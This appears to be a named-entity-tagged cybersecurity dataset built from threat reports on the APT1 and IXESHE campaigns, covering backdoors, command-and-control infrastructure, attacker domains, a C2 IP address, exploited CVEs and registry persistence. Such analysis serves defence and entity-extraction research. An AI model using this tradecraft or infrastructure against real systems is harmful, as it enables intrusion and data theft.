B-IDTY +61398 E-IDTY +. O + +The O +nature O +of O +“ O +Unit B-IDTY +61398 E-IDTY +’s O +” O +work O +is O +considered O +by O +China S-LOC +to O +be O +a O +state O +secret O +; O +however O +, O +we O +believe O +it O +engages O +in O +harmful O +“ O +Computer O +Network O +Operations. O +” O +Unit B-IDTY +61398 E-IDTY +is O +partially O +situated O +on O +Datong B-LOC +Road E-LOC +in O +Gaoqiaozhen S-LOC +, O +which O +is O +located O +in O +the O +Pudong B-LOC +New I-LOC +Area E-LOC +of O +Shanghai S-LOC +. O + +The O +central O +building O +in O +this O +compound O +is O +a O +130,663 O +square O +foot O +facility O +that O +is O +12 O +stories O +high O +and O +was O +built O +in O +early O +2007 S-TIME +. 
O + +APT1 S-APT +has O +systematically O +stolen O +hundreds O +of O +terabytes O +of O +data O +from O +at O +least O +141 O +organizations O +, O +and O +has O +demonstrated O +the O +capability O +and O +intent O +to O +steal O +from O +dozens O +of O +organizations O +simultaneously O +. O + +Since O +2006 S-TIME +, O +Mandiant S-SECTEAM +has O +observed O +APT1 S-APT +compromise O +141 O +companies O +spanning O +20 O +major O +industries O +. O + +APT1 S-APT +has O +a O +well-defined O +attack O +methodology O +, O +honed O +over O +years O +and O +designed O +to O +steal O +large O +volumes O +of O +valuable O +intellectual O +property O +. O + +Once O +APT1 S-APT +has O +established O +access O +, O +they O +periodically O +revisit O +the O +victim O +’s O +network O +over O +several O +months O +or O +years O +and O +steal O +broad O +categories O +of O +intellectual O +property O +, O +including O +technology O +blueprints O +, O +proprietary O +manufacturing O +processes O +, O +test O +results O +, O +business O +plans O +, O +pricing O +documents O +, O +partnership O +agreements O +, O +and O +emails S-TOOL +and O +contact O +lists O +from O +victim O +organizations O +’ O +leadership O +. O + +APT1 S-APT +uses O +some O +tools O +and O +techniques O +that O +we O +have O +not O +yet O +observed O +being O +used O +by O +other O +groups O +including O +two O +utilities O +designed O +to O +steal O +email S-TOOL +— O +GETMAIL S-MAL +and O +MAPIGET S-MAL +. O + +Establishing O +a O +foothold O +involves O +actions O +that O +ensure O +control O +of O +the O +target O +network O +’s O +systems O +from O +outside O +the O +network O +. O + +APT1 S-APT +establishes O +a O +foothold O +once O +email S-TOOL +recipients O +open O +a O +malicious O +file O +and O +a O +backdoor O +is O +subsequently O +installed O +. O + +A O +backdoor O +is O +software O +that O +allows O +an O +intruder O +to O +send O +commands O +to O +the O +system O +remotely O +. 
O + +In O +almost O +every O +case O +, O +APT O +backdoors O +initiate O +outbound O +connections O +to O +the O +intruder O +’s O +“ O +command O +and O +control O +” O +( O +C2 S-TOOL +) O +server O +. O + +APT O +intruders O +employ O +this O +tactic O +because O +while O +network O +firewalls O +are O +generally O +adept O +at O +keeping O +malware O +outside O +the O +network O +from O +initiating O +communication O +with O +systems O +inside O +the O +network O +, O +they O +are O +less O +reliable O +at O +keeping O +malware O +that O +is O +already O +inside O +the O +network O +from O +communicating O +to O +systems O +outside O +. O + +While O +APT1 S-APT +intruders O +occasionally O +use O +publicly O +available O +backdoors O +such O +as O +Poison B-MAL +Ivy E-MAL +and O +Gh0st B-MAL +RAT E-MAL +, O +the O +vast O +majority O +of O +the O +time O +they O +use O +what O +appear O +to O +be O +their O +own O +custom O +backdoors O +. O + +We O +will O +describe O +APT1 S-APT +’s O +backdoors O +in O +two O +categories O +: O +“ O +Beachhead O +Backdoors O +” O +and O +“ O +Standard O +Backdoors. O +” O + +Beachhead O +backdoors O +are O +typically O +minimally O +featured O +. O + +They O +offer O +the O +attacker O +a O +toe-hold O +to O +perform O +simple O +tasks O +like O +retrieve O +files O +, O +gather O +basic O +system O +information O +and O +trigger O +the O +execution O +of O +other O +more O +significant O +capabilities O +such O +as O +a O +standard O +backdoor O +. O + +APT1 S-APT +’s O +beachhead O +backdoors O +are O +usually O +what O +we O +call O +WEBC2 B-MAL +backdoors E-MAL +. O + +WEBC2 B-MAL +backdoors E-MAL +are O +probably O +the O +most O +well-known O +kind O +of O +APT1 S-APT +backdoor O +, O +and O +are O +the O +reason O +why O +some O +security O +companies O +refer O +to O +APT1 S-APT +as O +the O +“ O +Comment O +Crew. 
O +” O +A O +WEBC2 B-MAL +backdoor E-MAL +is O +designed O +to O +retrieve O +a O +webpage O +from O +a O +C2 S-TOOL +server O +. O + +It O +expects O +the O +webpage O +to O +contain O +special O +HTML S-TOOL +tags O +; O +the O +backdoor O +will O +attempt O +to O +interpret O +the O +data O +between O +the O +tags O +as O +commands O +. O + +Older O +versions O +of O +WEBC2 S-MAL +read O +data O +between O +HTML S-TOOL +comments O +, O +though O +over O +time O +WEBC2 S-MAL +variants O +have O +evolved O +to O +read O +data O +contained O +within O +other O +types O +of O +tags O +. O + +From O +direct O +observation O +, O +we O +can O +confirm O +that O +APT1 S-APT +was O +using O +WEBC2 B-MAL +backdoors E-MAL +as O +early O +as O +July B-TIME +2006 E-TIME +. O + +However O +, O +the O +first O +compile O +time35 O +we O +have O +for O +WEBC2 S-MAL +is O +2004-01-23 S-TIME +, O +suggesting O +that O +APT1 S-APT +has O +been O +crafting O +WEBC2 B-MAL +backdoors E-MAL +since O +early O +2004 S-TIME +. O + +Based O +on O +the O +400+ O +samples O +of O +WEBC2 S-MAL +variants O +that O +we O +have O +accumulated O +, O +it O +appears O +that O +APT1 S-APT +has O +direct O +access O +to O +developers O +who O +have O +continually O +released O +new O +WEBC2 S-MAL +variants O +for O +over O +six O +years O +. O + +WEBC2 B-MAL +backdoors E-MAL +are O +often O +packaged O +with O +spear B-ACT +phishing E-ACT +emails S-TOOL +. O + +Once O +installed O +, O +APT1 S-APT +intruders O +have O +the O +option O +to O +tell O +victim O +systems O +to O +download O +and O +execute O +additional O +malicious O +software O +of O +their O +choice O +. O + +WEBC2 B-MAL +backdoors E-MAL +work O +for O +their O +intended O +purpose O +, O +but O +they O +generally O +have O +fewer O +features O +than O +the O +“ O +Standard O +Backdoors O +” O +described O +below O +. 
O + +The O +standard O +, O +non-WEBC2 S-MAL +APT1 S-APT +backdoor O +typically O +communicates O +using O +the O +HTTP S-PROT +protocol O +( O +to O +blend O +in O +with O +legitimate O +web O +traffic O +) O +or O +a O +custom O +protocol O +that O +the O +malware O +authors O +designed O +themselves O +. O + +These O +backdoors O +give O +APT O +intruders O +a O +laundry O +list O +of O +ways O +to O +control O +victim O +systems O +. O + +The O +BISCUIT B-MAL +backdoor E-MAL +( O +so O +named O +for O +the O +command O +“ O +bdkzt S-MAL +” O +) O +is O +an O +illustrative O +example O +of O +the O +range O +of O +commands O +that O +APT1 S-APT +has O +built O +into O +its O +“ O +standard O +” O +backdoors O +. O + +APT1 S-APT +has O +used O +and O +steadily O +modified O +BISCUIT S-MAL +since O +as O +early O +as O +2007 O +and O +continues O +to O +use O +it O +presently O +. O + +Some O +APT O +backdoors O +attempt O +to O +mimic O +legitimate O +Internet O +traffic O +other O +than O +the O +HTTP S-PROT +protocol O +. O + +When O +network O +defenders O +see O +the O +communications O +between O +these O +backdoors O +and O +their O +C2 S-TOOL +servers O +, O +they O +might O +easily O +dismiss O +them O +as O +legitimate O +network O +traffic O +. O + + +APT1 S-APT +. O + +APT1 S-APT +maintains O +an O +extensive O +infrastructure O +of O +computers O +around O +the O +world O +. O + +We O +have O +evidence O +suggesting O +that O +APT1 S-APT +manually O +controls O +thousands O +of O +systems O +in O +support O +of O +their O +attacks O +, O +and O +have O +directly O +observed O +their O +control O +over O +hundreds O +of O +these O +systems O +. 
O + +Although O +they O +control O +systems O +in O +dozens O +of O +countries O +, O +their O +attacks O +originate O +from O +four O +large O +networks O +in O +Shanghai S-LOC +— O +two O +of O +which O +are O +allocated O +directly O +to O +the O +Pudong B-LOC +New I-LOC +Area E-LOC +, O +the O +home O +of O +Unit B-IDTY +61398 E-IDTY +. O + +The O +sheer O +number O +of O +APT1 S-APT +IP O +addresses O +concentrated O +in O +these O +Shanghai S-LOC +ranges O +, O +coupled O +with O +Simplified B-TOOL +Chinese I-TOOL +keyboard E-TOOL +layout O +settings O +on O +APT1 S-APT +’s O +attack O +systems O +, O +betrays O +the O +true O +location O +and O +language O +of O +the O +operators O +. O + +To O +help O +manage O +the O +vast O +number O +of O +systems O +they O +control O +, O +APT1 S-APT +has O +registered O +hundreds O +of O +domain O +names O +, O +the O +majority O +of O +which O +also O +point O +to O +a O +Shanghai S-LOC +locale O +. O + +The O +domain O +names O +and O +IP O +addresses O +together O +comprise O +APT1 S-APT +’s O +command B-TOOL +and I-TOOL +control E-TOOL +framework O +which O +they O +manage O +in O +concert O +to O +camouflage O +their O +true O +origin O +from O +their O +English O +speaking O +targets O +. O + +As O +covered O +in O +the O +previous O +“ O +Attack O +Lifecycle O +” O +section O +, O +WEBC2 B-MAL +backdoor E-MAL +variants O +download O +and O +interpret O +data O +stored O +between O +tags O +in O +HTML S-TOOL +pages O +as O +commands O +. O + +They O +usually O +download O +HTML S-TOOL +pages O +from O +a O +system O +within O +APT1 S-APT +’s O +hop O +infrastructure O +. O + +We O +have O +observed O +APT1 S-APT +intruders O +logging O +in O +to O +WEBC2 S-MAL +servers O +and O +manually O +editing O +the O +HTML S-TOOL +pages O +that O +backdoors O +will O +download O +. 
O + +Because O +the O +commands O +are O +usually O +encoded O +and O +difficult O +to O +spell O +from O +memory O +, O +APT1 S-APT +intruders O +typically O +do O +not O +type O +these O +strings O +, O +but O +instead O +copy O +and O +paste O +them O +into O +the O +HTML S-TOOL +files O +. O + +They O +likely O +generate O +the O +encoded O +commands O +on O +their O +own O +systems O +before O +pasting O +them O +in O +to O +an O +HTML S-TOOL +file O +hosted O +by O +the O +hop O +point O +. O + +For O +example O +, O +we O +observed O +an O +APT O +attacker O +pasting O +the O +string O +“ O +czo1NA== O +” O +into O +an O +HTML S-TOOL +page O +. O + +That O +string O +is O +the O +base64 S-ENCR +encoded O +version O +of O +“ O +s O +: O +54 O +” O +, O +meaning O +“ O +sleep O +for O +54 O +minutes O +” O +( O +or O +hours O +, O +depending O +on O +the O +particular O +backdoor O +) O +. O + +In O +lieu O +of O +manually O +editing O +an O +HTML S-TOOL +file O +on O +a O +hop O +point O +, O +we O +have O +also O +observed O +APT1 S-APT +intruders O +uploading O +new O +( O +already-edited O +) O +HTML S-TOOL +files O +. O + +When O +APT1 S-APT +attackers O +are O +not O +using O +WEBC2 S-MAL +, O +they O +require O +a O +“ O +command B-TOOL +and I-TOOL +control E-TOOL +” O +( O +C2 S-TOOL +) O +user O +interface O +so O +they O +can O +issue O +commands O +to O +the O +backdoor O +. O + +This O +interface O +sometimes O +runs O +on O +their O +personal O +attack O +system O +, O +which O +is O +typically O +in O +Shanghai S-LOC +. O + +In O +these O +instances O +, O +when O +a O +victim O +backdoor O +makes O +contact O +with O +a O +hop O +, O +the O +communications O +need O +to O +be O +forwarded O +from O +the O +hop O +to O +the O +intruder O +’s O +Shanghai S-LOC +system O +so O +the O +backdoor O +can O +talk O +to O +the O +C2 S-TOOL +server O +software O +. 
O + +We O +have O +observed O +767 O +separate O +instances O +in O +which O +APT1 S-APT +intruders O +used O +the O +publicly O +available O +“ O +HUC B-TOOL +Packet I-TOOL +Transmit I-TOOL +Tool E-TOOL +” O +or O +HTRAN S-TOOL +on O +a O +hop O +. O + +As O +always O +, O +keep O +in O +mind O +that O +these O +uses O +are O +confirmed O +uses O +, O +and O +likely O +represent O +only O +a O +small O +fraction O +of O +APT1 S-APT +’s O +total O +activity O +. O + +The O +HTRAN S-TOOL +utility O +is O +merely O +a O +middle-man O +, O +facilitating O +connections O +between O +the O +victim O +and O +the O +attacker O +who O +is O +using O +the O +hop O +point O +. O + +Typical O +use O +of O +HTRAN S-TOOL +is O +fairly O +simple O +: O +the O +attacker O +must O +specify O +the O +originating O +IP O +address O +( O +of O +his O +or O +her O +workstation O +in O +Shanghai S-LOC +) O +, O +and O +a O +port O +on O +which O +to O +accept O +connections O +. O + +For O +example O +, O +the O +following O +command O +, O +which O +was O +issued O +by O +an O +APT1 S-APT +actor O +, O +will O +listen O +for O +incoming O +connections O +on O +port O +443 O +on O +the O +hop O +and O +automatically O +proxy O +them O +to O +the O +Shanghai S-LOC +IP O +address O +58.247.242.254 S-IP +on O +port O +443 O +. O + +Occasionally O +, O +APT1 S-APT +attackers O +have O +installed O +C2 S-TOOL +server O +components O +on O +systems O +in O +their O +hop O +infrastructure O +rather O +than O +forwarding O +connections O +back O +to O +C2 S-TOOL +servers O +in O +Shanghai S-LOC +. O + +In O +these O +instances O +they O +do O +not O +need O +to O +use O +a O +proxy O +tool O +like O +HTRAN S-TOOL +to O +interact O +with O +victim O +systems O +. O + +However O +, O +it O +does O +mean O +that O +the O +intruders O +need O +to O +be O +able O +to O +interface O +with O +the O +( O +often O +graphical O +) O +C2 S-TOOL +server O +software O +running O +on O +the O +hop O +. 
O + +We O +have O +observed O +APT1 S-APT +intruders O +log O +in O +to O +their O +hop O +point O +, O +start O +the O +C2 S-TOOL +server O +, O +wait O +for O +incoming O +connections O +, O +and O +then O +proceed O +to O +give O +commands O +to O +victim O +systems O +. O + +WEBC2 S-MAL +variants O +may O +include O +a O +server O +component O +that O +provides O +a O +simple O +C2 S-TOOL +interface O +to O +the O +intruder O +. O + +This O +saves O +the O +intruder O +from O +having O +to O +manually O +edit O +webpages O +. O + +That O +is O +, O +this O +server O +component O +receives O +connections O +from O +victim O +backdoors O +, O +displays O +them O +to O +the O +intruder O +, O +and O +then O +translates O +the O +intruder O +’s O +commands O +into O +HTML S-TOOL +tags O +that O +the O +victim O +backdoors O +read O +. O + +In O +the O +last O +two O +years O +alone O +, O +we O +have O +confirmed O +937 O +APT1 S-APT +C2 S-TOOL +servers O +— O +that O +is O +, O +actively O +listening O +or O +communicating O +programs O +— O +running O +on O +849 O +distinct O +IP O +addresses O +. O + +However O +, O +we O +have O +evidence O +to O +suggest O +that O +APT1 S-APT +is O +running O +hundreds O +, O +and O +likely O +thousands O +, O +of O +other O +servers O +( O +see O +the O +Domains O +section O +below O +) O +. O + +The O +programs O +acting O +as O +APT1 S-APT +servers O +have O +mainly O +been O +: O +FTP S-PROT +, O +for O +transferring O +files O +; O +web O +, O +primarily O +for O +WEBC2 S-MAL +; O +RDP S-PROT +, O +for O +remote O +graphical O +control O +of O +a O +system O +; O +HTRAN S-TOOL +, O +for O +proxying O +; O +and O +C2 S-TOOL +servers O +associated O +with O +various O +backdoor O +families O +. O + +The O +Domain B-PROT +Name I-PROT +System E-PROT +( O +DNS S-PROT +) O +is O +the O +phone O +book O +of O +the O +Internet O +. 
O + +In O +the O +same O +way O +that O +people O +program O +named O +contacts O +into O +their O +cell O +phones O +and O +no O +longer O +need O +to O +remember O +phone O +numbers O +, O +DNS S-PROT +allows O +people O +to O +remember O +names O +like O +“ O +google.com S-DOM +” O +instead O +of O +IP O +addresses O +. O + +When O +a O +person O +types O +“ O +google.com S-DOM +” O +into O +a O +web O +browser O +, O +a O +DNS S-PROT +translation O +to O +an O +IP O +address O +occurs O +so O +that O +the O +person O +’s O +computer O +can O +communicate O +with O +Google S-IDTY +. O + +Names O +that O +can O +be O +translated O +through O +DNS S-PROT +to O +IP O +addresses O +are O +referred O +to O +as O +Fully B-TOOL +Qualified I-TOOL +Domain I-TOOL +Names E-TOOL +( O +FQDNs S-TOOL +) O +. O + +A O +DNS S-PROT +zone O +represents O +a O +collection O +of O +FQDNs S-TOOL +that O +end O +with O +the O +same O +name O +, O +and O +which O +are O +usually O +registered O +through O +a O +domain O +registration O +company O +and O +controlled O +by O +a O +single O +owner O +. O + +For O +example O +, O +“ O +hugesoft.org S-DOM +” O +is O +an O +FQDN S-TOOL +but O +also O +represents O +a O +zone O +. O + +The O +FQDNs S-TOOL +“ O +ug-co.hugesoft.org S-DOM +” O +and O +“ O +7cback.hugesoft.org S-DOM +” O +are O +part O +of O +the O +“ O +hugesoft.org S-DOM +” O +zone O +and O +are O +called O +“ O +subdomains O +” O +of O +the O +zone O +. O + +The O +person O +who O +registered O +“ O +hugesoft.org S-DOM +” O +may O +add O +as O +many O +subdomains O +as O +they O +wish O +and O +controls O +the O +IP O +resolutions O +of O +these O +FQDNs S-TOOL +. O + +APT1 S-APT +has O +registered O +at O +least O +107 O +zones O +since O +2004 S-TIME +. 
O + +Within O +these O +zones O +, O +we O +know O +of O +thousands O +of O +FQDNs S-TOOL +that O +have O +resolved O +to O +hundreds O +of O +IP O +addresses O +( O +which O +we O +suspect O +are O +hops O +) O +and O +in O +some O +instances O +to O +APT1 S-APT +’s O +source O +IP O +addresses O +in O +Shanghai S-LOC +. O + +The O +first O +zone O +we O +became O +aware O +of O +was O +“ O +hugesoft.org S-DOM +” O +, O +which O +was O +registered O +through O +eNom O +, O +Inc. O +in O +October B-TIME +2004 E-TIME +. O + +The O +registrant O +supplied O +“ O +uglygorilla@163.com S-EMAIL +” O +as O +an O +email S-TOOL +address O +. O + +The O +supplied O +registration O +information O +, O +which O +is O +still O +visible O +in O +public O +“ O +whois S-TOOL +” O +data O +as O +of O +February B-TIME +3, I-TIME +2013 E-TIME +. O + +The O +supplied O +registrant O +information O +does O +not O +need O +to O +be O +accurate O +for O +the O +zone O +to O +be O +registered O +successfully O +. O + +For O +example O +, O +“ O +shanghai O +” O +is O +not O +a O +street O +name O +. O + +Nevertheless O +, O +it O +is O +noteworthy O +that O +Shanghai S-LOC +appeared O +in O +the O +first O +known O +APT1 S-APT +domain O +registration O +, O +along O +with O +a O +phone O +number O +that O +begins O +with O +China S-LOC +’s O +“ O ++86 O +” O +international O +code O +. O + +In O +fact O +, O +Shanghai S-LOC +was O +listed O +as O +the O +registrant O +’s O +city O +in O +at O +least O +24 O +of O +the O +107 O +( O +22% O +) O +registrations O +. 
O + +Overall O +, O +the O +combination O +of O +a O +relatively O +high O +number O +of O +“ O +Shanghai S-LOC +” O +registrations O +with O +obviously O +false O +registration O +examples O +in O +other O +registrations O +suggests O +a O +partially O +uncoordinated O +domain O +registration O +campaign O +from O +2004 S-TIME +until O +present O +, O +in O +which O +some O +registrants O +tried O +to O +fabricate O +non-Shanghai S-LOC +locations O +but O +others O +did O +not O +. O + +This O +is O +supported O +by O +contextual O +information O +on O +the O +Internet O +for O +the O +email S-TOOL +address O +“ O +lfengg@163.com S-EMAIL +, O +” O +which O +was O +supplied O +in O +the O +registration O +information O +for O +seven O +of O +the O +107 O +zones O +. O + +On O +the O +site O +“ O +www.china-one.org S-DOM +, O +” O +the O +email S-TOOL +address O +“ O +lfengg@163.com S-EMAIL +” O +appears O +as O +the O +contact O +for O +the O +Shanghai S-LOC +Kai B-IDTY +Optical I-IDTY +Information I-IDTY +Technology E-IDTY +Co. O +, O +Ltd. O +, O +a O +website O +production O +company O +located O +in O +a O +part O +of O +Shanghai S-LOC +that O +is O +across O +the O +river O +from O +PLA S-IDTY +Unit B-IDTY +61398 E-IDTY +. O + +About O +half O +of O +APT1 S-APT +’s O +known O +zones O +were O +named O +according O +to O +three O +themes O +: O +news O +, O +technology O +and O +business O +. O + +These O +themes O +cause O +APT1 S-APT +command O +and O +control O +addresses O +to O +appear O +benign O +at O +first O +glance O +. O + +However O +, O +we O +believe O +that O +the O +hundreds O +of O +FQDNs S-TOOL +within O +these O +zones O +were O +created O +for O +the O +purpose O +of O +APT1 S-APT +intrusions O +. O +( O +Note O +: O +these O +themes O +are O +not O +unique O +to O +APT1 S-APT +or O +even O +APT O +in O +general O +. 
O +) O +The O +news-themed O +zones O +include O +the O +names O +of O +well-known O +news O +media O +outlets O +such O +as O +CNN S-IDTY +, O +Yahoo S-IDTY +and O +Reuters S-IDTY +. O + +However O +, O +they O +also O +include O +names O +referencing O +English-speaking O +countries O +, O +such O +as O +“ O +aunewsonline.com S-DOM +” O +( O +Australia S-LOC +) O +, O +“ O +canadatvsite.com S-DOM +” O +( O +Canada S-LOC +) O +, O +and O +“ O +todayusa.org S-DOM +” O +( O +U.S B-LOC +. E-LOC +) O +. O + +Below O +is O +a O +list O +of O +zones O +registered O +by O +APT1 S-APT +that O +are O +newsthemed O +: O + +aoldaily.com S-DOM +aunewsonline.com S-DOM +canadatvsite.com S-DOM +canoedaily.com S-DOM +cnndaily.com S-DOM +cnndaily.net S-DOM +cnnnewsdaily.com S-DOM +defenceonline.net S-DOM +freshreaders.net S-DOM +giftnews.org S-DOM +reutersnewsonline.com S-DOM +rssadvanced.org S-DOM +saltlakenews.org S-DOM +sportreadok.net S-DOM +todayusa.org S-DOM +usapappers.com S-DOM +usnewssite.com S-DOM +yahoodaily.com S-DOM +. O + +The O +technology-themed O +zones O +reference O +well-known O +technology O +companies O +( O +AOL S-IDTY +, O +Apple S-IDTY +, O +Google S-IDTY +, O +Microsoft S-IDTY +) O +, O +antivirus O +vendors O +( O +McAfee S-IDTY +, O +Symantec S-IDTY +) O +, O +and O +products O +( O +Blackberry S-IDTY +, O +Bluecoat S-IDTY +) O +. O + +APT1 S-APT +also O +used O +more O +generic O +names O +referencing O +topics O +like O +software O +: O + +globalowa.com S-DOM +gmailboxes.com S-DOM +hugesoft.org S-DOM +idirectech.com S-DOM +ifexcel.com S-DOM +infosupports.com S-DOM +livemymsn.com S-DOM +mcafeepaying.com S-DOM +microsoft-update-info.com S-DOM +micyuisyahooapis.com S-DOM +msnhome.org S-DOM +pcclubddk.net S-DOM +progammerli.com S-DOM +softsolutionbox.net S-DOM +symanteconline.net S-DOM +webservicesupdate.com S-DOM +. O + +Finally O +, O +some O +zones O +used O +by O +APT1 S-APT +reflect O +a O +business O +theme O +. 
O + +The O +names O +suggest O +websites O +that O +professionals O +might O +visit O +: O + +advanbusiness.com S-DOM +businessconsults.net S-DOM +businessformars.com S-DOM +companyinfosite.com S-DOM +conferencesinfo.com S-DOM +copporationnews.com S-DOM +. O + +APT1 S-APT +intruders O +often O +use O +the O +FQDNs S-TOOL +that O +are O +associated O +with O +legitimate O +websites O +hosted O +by O +their O +hop O +points O +. O + +We O +consider O +these O +domains O +to O +be O +“ O +hijacked O +” O +because O +they O +were O +registered O +by O +someone O +for O +a O +legitimate O +reason O +, O +but O +have O +been O +leveraged O +by O +APT1 S-APT +for O +malicious O +purposes O +. O + +APT1 S-APT +uses O +hijacked O +FQDNs S-TOOL +for O +two O +main O +purposes O +. O + +First O +, O +they O +place O +malware O +( O +usually O +in O +ZIP S-TOOL +files O +) O +on O +the O +legitimate O +websites O +hosted O +on O +the O +hop O +point O +and O +then O +send O +spear B-ACT +phishing E-ACT +emails S-TOOL +with O +a O +link O +that O +includes O +the O +legitimate O +FQDN S-TOOL +. O + + +APT12 S-APT +. O + +This O +research O +paper O +will O +delve O +into O +another O +prominent O +group O +of O +attackers O +referred O +to O +as O +“ O +IXESHE S-APT +” O +( O +pronounced O +“ O +i-sushi O +” O +) O +, O +based O +on O +one O +of O +the O +more O +common O +detection O +names O +security O +companies O +use O +for O +the O +malware O +they O +utilize O +. O + +This O +campaign O +is O +notable O +for O +targeting O +East O +Asian O +governments O +, O +electronics O +manufacturers O +, O +and O +a O +telecommunications O +company O +. O + +The O +IXESHE S-APT +campaign O +makes O +use O +of O +targeted O +emails S-TOOL +with O +malicious O +attachments O +to O +compromise O +victims O +’ O +systems O +. 
O + +The O +emails S-TOOL +are O +often O +tailored O +for O +specific O +victims O +and O +contain O +malicious O +attachments O +that O +are O +almost O +always O +“ O +weaponized O +” O +.PDF S-FILE +files O +with O +known O +exploits O +that O +drop O +malware O +executables O +onto O +targeted O +systems O +. O + +In O +addition O +, O +the O +IXESHE S-APT +attackers O +conducted O +two O +specific O +attacks O +that O +leveraged O +zero-day S-VULNAME +exploits—one O +in O +2009 O +and O +another O +in O +2011 O +. O + +The O +IXESHE S-APT +attackers O +almost O +always O +make O +use O +of O +compromised O +servers O +as O +command-and-control S-TOOL +( O +C&C S-TOOL +) O +servers O +. O + +In O +some O +cases O +, O +the O +compromised O +servers O +are O +hosted O +on O +target O +organizations O +’ O +networks O +after O +successful O +infiltration O +so O +the O +attackers O +can O +increase O +their O +control O +of O +the O +victims O +’ O +infrastructure O +. O + +Using O +this O +approach O +, O +the O +attackers O +amassed O +at O +least O +60 O +C&C S-TOOL +servers O +over O +time O +. O + +This O +technique O +also O +allows O +the O +attackers O +to O +cover O +their O +tracks O +, O +as O +having O +the O +C&C S-TOOL +server O +in O +the O +victims O +’ O +corporate O +networks O +means O +very O +little O +C&C S-TOOL +traffic O +leaves O +them O +. O + +The O +attackers O +’ O +deliberate O +use O +of O +compromised O +machines O +and O +dynamic O +Domain B-PROT +Name I-PROT +System E-PROT +( O +DNS S-PROT +) O +services O +allows O +them O +to O +hide O +traces O +of O +their O +presence O +by O +confusing O +their O +activities O +with O +data O +belonging O +to O +legitimate O +individuals O +. 
O + +Looking O +at O +threat O +intelligence O +derived O +from O +tracking O +APT O +campaigns O +over O +time O +primarily O +based O +on O +the O +network O +traffic O +generated O +by O +the O +malware O +used O +, O +we O +were O +able O +to O +develop O +indicators O +of O +compromise O +for O +the O +IXESHE S-APT +campaign O +. O + +The O +malware O +samples O +used O +in O +this O +campaign O +were O +not O +very O +complicated O +by O +nature O +but O +do O +give O +the O +attackers O +almost O +complete O +control O +over O +their O +targets O +’ O +compromised O +systems O +. O + +Most O +of O +the O +IP O +addresses O +of O +IXESHE S-APT +’s O +victims O +are O +linked O +to O +DSL S-TOOL +networks O +, O +which O +made O +it O +difficult O +to O +determine O +their O +identities O +. O + +Careful O +research O +, O +however O +, O +allowed O +the O +identification O +of O +some O +of O +the O +attackers O +’ O +victims O +: O +East O +Asian O +governments O +, O +Taiwanese O +electronics O +manufacturers O +, O +A O +telecommunications O +company O +. O + +Campaign O +victims O +were O +identified O +by O +using O +Whois S-TOOL +records O +and O +open O +source O +research O +. O + +Trend B-SECTEAM +Micro E-SECTEAM +generally O +notifies O +customers O +that O +are O +believed O +to O +have O +been O +specifically O +targeted O +by O +APT O +campaigns O +. O + +The O +IXESHE S-APT +attackers O +have O +been O +actively O +launching O +highly O +targeted O +attacks O +since O +at O +least O +July O +2009 O +. O + +Available O +data O +on O +the O +IXESHE S-APT +campaign O +indicates O +that O +targeted O +emails S-TOOL +with O +malicious O +.PDF S-FILE +file O +attachments O +were O +the O +attackers O +’ O +vector O +of O +choice O +. 
O + +In O +most O +cases O +, O +the O +attacks O +involved O +Adobe B-TOOL +Acrobat E-TOOL +, O +Reader S-TOOL +, O +and O +Flash B-TOOL +Player E-TOOL +exploits O +such O +as O +: O +CVE-2009-4324 S-VULID +, O +CVE-2009-0927 S-VULID +, O +CVE-2011-0609 S-VULID +, O +CVE-2011-0611 S-VULID +. O + +It O +should O +also O +be O +noted O +that O +this O +campaign O +used O +CVE-2009-4324 S-VULID +and O +CVE-2011-0609 S-VULID +exploits O +when O +these O +were O +still O +unpatched O +or O +considered O +zero-day S-VULNAME +vulnerabilities O +. O + +The O +IXESHE S-APT +attackers O +also O +used O +an O +exploit O +that O +affected O +Microsoft S-IDTY +Excel S-TOOL +— O +CVE-2009-3129 S-VULID +. O + +Every O +IXESHE S-APT +case O +we O +examined O +revealed O +that O +the O +original O +infection O +vector O +was O +a O +targeted O +email S-TOOL +with O +a O +PDF S-TOOL +exploit O +as O +attachment O +. O + +Older O +versions O +also O +used O +an O +XLS S-TOOL +exploit O +. O + +Opening O +the O +.PDF S-FILE +file O +drops O +and O +executes O +a O +malware O +in O +a O +victim O +’s O +system O +. O + +The O +malware O +displays O +a O +blank O +.PDF O +file O +or O +a O +decoy O +document O +related O +to O +the O +targeted O +attack O +. O + +The O +emails S-TOOL +normally O +come O +from O +compromised O +personal O +accounts O +or O +are O +entirely O +spoofed O +. O + +emails S-TOOL +from O +spoofed O +senders O +were O +usually O +sent O +via O +mail O +servers O +in O +the O +United B-LOC +States E-LOC +and O +China S-LOC +. O + +The O +malware O +also O +sets O +the O +executable O +file O +’s O +attributes O +to O +“ O +Hidden. O +” O +Some O +of O +the O +file O +names O +the O +attackers O +used O +include O +: O +winhlps.exe S-FILE +, O +acrotry.exe S-FILE +, O +AcroRd32.exe S-FILE +, O +Updater.exe S-FILE +. 
O + +In O +order O +for O +the O +malware O +to O +survive O +rebooting O +, O +it O +normally O +creates O +the O +following O +registry O +run O +key O +: O +HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run O +. O + +The O +registry O +run O +key O +, O +in O +turn O +, O +points O +to O +the O +malware O +that O +has O +been O +dropped O +. O + +The O +value O +name O +of O +this O +entry O +varies O +from O +sample O +to O +sample O +. O + +Some O +of O +the O +names O +the O +attackers O +used O +for O +it O +include O +: O +Adobe B-TOOL +Assistant E-TOOL +, O +Migrated S-TOOL +. O + +Upon O +installation O +, O +the O +malware O +starts O +communicating O +with O +one O +of O +its O +C&C S-TOOL +servers O +. O + +Most O +of O +the O +samples O +appeared O +to O +have O +at O +least O +three O +C&C S-TOOL +servers O +hard O +coded O +for O +redundancy O +. O + +Some O +samples O +alternatively O +use O +an O +FGKD.jsp S-FILE +or O +an O +FPK.jsp S-FILE +file O +. O + +The O +Base64 S-ENCR +blob O +is O +of O +particular O +interest O +. O + +It O +makes O +use O +of O +a O +custom O +Base64 S-ENCR +alphabet O +. O + +Once O +decoded O +, O +this O +blob O +reveals O +a O +standardized O +structure O +of O +the O +information O +sent O +to O +the O +registered O +C&C S-TOOL +server O +, O +which O +includes O +the O +following O +details O +: O +Computer O +name O +, O +Local O +IP O +address O +, O +Proxy O +server O +IP O +and O +port O +, O +Malware O +ID O +. 
